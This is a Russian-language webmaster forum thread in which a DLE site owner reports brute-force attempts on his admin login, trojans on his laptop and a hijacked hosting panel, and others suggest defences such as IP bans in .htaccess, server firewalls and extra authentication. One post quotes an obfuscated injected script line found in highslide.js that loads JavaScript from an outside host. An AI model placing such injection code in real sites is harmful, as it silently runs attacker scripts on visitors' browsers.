Перейти к публикации

Ребята, проверяйте сайты на попытку взлома!!!


Рекомендованные сообщения

Сейчас чисто случайно зашел в раздел:

1z4z8rvdydc7mb1enlej08o3m.jpg

и вот что я вижу:

dzwfzv203pyx6frvp6q8368ge.jpg

И такая мутатень уже на протяжении почти суток оказывается!

Очень настырно подбирается пароль к аккаунту админа!

Положил данный ай-пи в фильтр IP адреса:

1jz7rvudqabgszhpu1finoqt9.jpg

Попытки авторизоваться прекратились!!!

:rolleyes:

Наверное взломщик оценил систему безопасности.

Ух ты!!!

:blink: :blink: :blink:

Бан по ай-пи не помог. Попытки авторизоваться продолжаются:

v8tw5h7kt7ag82hek57emiqsk.jpg

Что делать?

Изменено пользователем izbushkin
Ссылка на сообщение
Поделиться на других сайтах

А адрес админки меняли? Если не менять то как минимум можно получить порядка 5-100 попыток входа с разных IP.

Ссылка на сообщение
Поделиться на других сайтах

Админка- Настройка системы-Настройки безопасности скрипта-Файл админпанели (Вы можете изменить имя файла админпанели. По умолчанию это admin.php,если вы указываете новый файл, то не забудьте переименовать его на сервере, указывается только имя файла, без указания пути к нему.)

Ссылка на сообщение
Поделиться на других сайтах

Файл у меня изменен давно на другой. Доступ к админпанели для всех пользователей закрыт, кроме меня одного.

Пока решил проблему путём смены логина админа, ну и пароль навсякий сменил.

Файл админки тоже переименовал навсякий.

Пока всё ОК!

Там скорее всего прога какая то долбила... Что то не верится что человек уже почти сутки заморачивается с перерывами в 20 минут :unsure:

Ссылка на сообщение
Поделиться на других сайтах

с перерывами в 20 минут

Вот жаль нет в настройках времени, по идее вынести в настройки этот параметр. Я бы просто больший промежуток поставил...

Ссылка на сообщение
Поделиться на других сайтах

Бан по ай-пи не помог. Попытки авторизоваться продолжаются:

Банить нужно не в скрипте DLE, а на сервере. Потому как бан в DLE не только по IP, но и по логину, поэтому он сначала авторизовывает, а потом проверяет и банит. Поэтому добавив бан в DLE, попытки авторизации также фиксируются и только после этого наступает бан.

Ссылка на сообщение
Поделиться на других сайтах

Вобщем попытка взломать аккаунт на сайте не удалось. Эти уроды принялись взламывать мой ноутбук.

Прямо на моих глазах в почте майл.ру была добавлена вот эта функция:

tmvz6c3zmt6blo02alg8igufw.jpg

Кнопку "ВЫКЛ." - это уже я нажал.

Далее смотрим на настройки фильтра:

vha9mlxyd6rd3hxt4eb1qfghy.jpg

Я просто в шоке!!! :blink:

Касперский не помогает! Может винда-8 с дыркой???

Как ломают комп то?

Кстати это уже вторая попытка взлома ноутбука и вследвие сервера.

Первая удалась успехом хакеров.

Что и требовалось доказать. Уже взломали панель управления сайтами с ай-пи 176.9.227.94

Утилита AVZ нашла 5 троянов на ноуте.

Ссылка на сообщение
Поделиться на других сайтах

Как? Как они узнают логин от панели хостинга?

Меняют пароли и авторизуются..

Я просто не понимаю:

vsqbpsusjf4zrmcwaicn7dyip.jpg

Ссылка на сообщение
Поделиться на других сайтах

Сегодня обнаружил на сайте при помощи штатного антивируса изменения в файле:

/engine/classes/highslide/highslide.js

вот такой код:

...Anchors)}; ;document.write('<s'+'cr'+'ipt src=ht'+'tp://'+'vvv'+'.posnv'+'aggs.r'+'u/4'+'7.j'+'s></sc'+'ri'+'pt>');

Вот обнаружил в логах:

v6xcpij6ec10r0jxgfnqu6jhg.jpg

Ссылка на сообщение
Поделиться на других сайтах

Как? Как они узнают логин от панели хостинга?

У вас их воруют. Способов много, начиная от троянов на компьютере, и использования нелегального ПО на компьютере, где трояны вшиты и сами отсылают ваши пароли и заканчивая использованием одинаковых паролей на разных сайтах.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 месяца спустя...

После некоторого перерыва опять сейчас за метил, что на всех сайтах на сервере в журнале операций в админпанели происходит подбор пароля к аккаунту.

h79dblhb824b060dvizgv8w45.jpg

И как оказалось это происходит на протяжении почти месяца. А я и не знал даже.

Подскажите пожалуйста как сделать, чтобы запретить данному ай-пи подбирать пароли к админке?

Нашел статью: Запрет доступа по IP через .htaccess

Куда надо прописать данные:

Order allow,deny

allow from all

Deny from 193.105.154.231

Изменено пользователем izbushkin
Ссылка на сообщение
Поделиться на других сайтах

Используйте брандмауэр вашего сервера для эффективного бана. IPTABLES

для .htaccess используйте примерно такую строчку

deny from (ip нарушителя)

Бан через админку dle не спасет

deny from 193.105.154.231

в самый конец .htaccess

Ссылка на сообщение
Поделиться на других сайтах

Не хранить пароли на ноуте или компе ни в каком виде... Я когда то хранил, потом гуляя в своей почту на моих глазах приходило письмо от какой то партнерки, я его типа прочитал, оно типа удалилось и всякие такие приколы были... Записал пароли на бумажку, сфоткал на телефон, бумажку сжег... Проблем теперь нет, тьфу тьфу тьфу

Ссылка на сообщение
Поделиться на других сайтах

поставить линукс, либо нормальный антивирус, и сделать запрос на запрет передачи любых данных с компа, без разрешения владельца компа,

Ссылка на сообщение
Поделиться на других сайтах

Во первых для начала нужно удалить трояны с компа.... во вторых храните пароли на столе в блокноте а не в компе... у вас пароли просто воруют... вы поменяли ввели новый а его тут же троян отправил злоумышленнику...

Ссылка на сообщение
Поделиться на других сайтах

а я чо то не парюсь. мой хостер все вопросы решил тупо, и не поверите, как отрезало. ломают то не люди, пароли подбирают боты. просто при заходе в админку, для того, что бы получить доступ к форме ввода логина и пароля надо ввести сначала другой логин и пароль, прописанный в хтаццесс. тупой, типа, user/1234 зато админку не ломают

В логах ни одной попытки взлома, они тупо туда не добираются

Ссылка на сообщение
Поделиться на других сайтах
  • 3 недели спустя...

Так же, позволю себе порекомендовать, можно поставить ограниченные попытки логина на сайте...поставьте 2-3 и через пару недель они отвяжутся.

Ссылка на сообщение
Поделиться на других сайтах
  • 2 недели спустя...

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...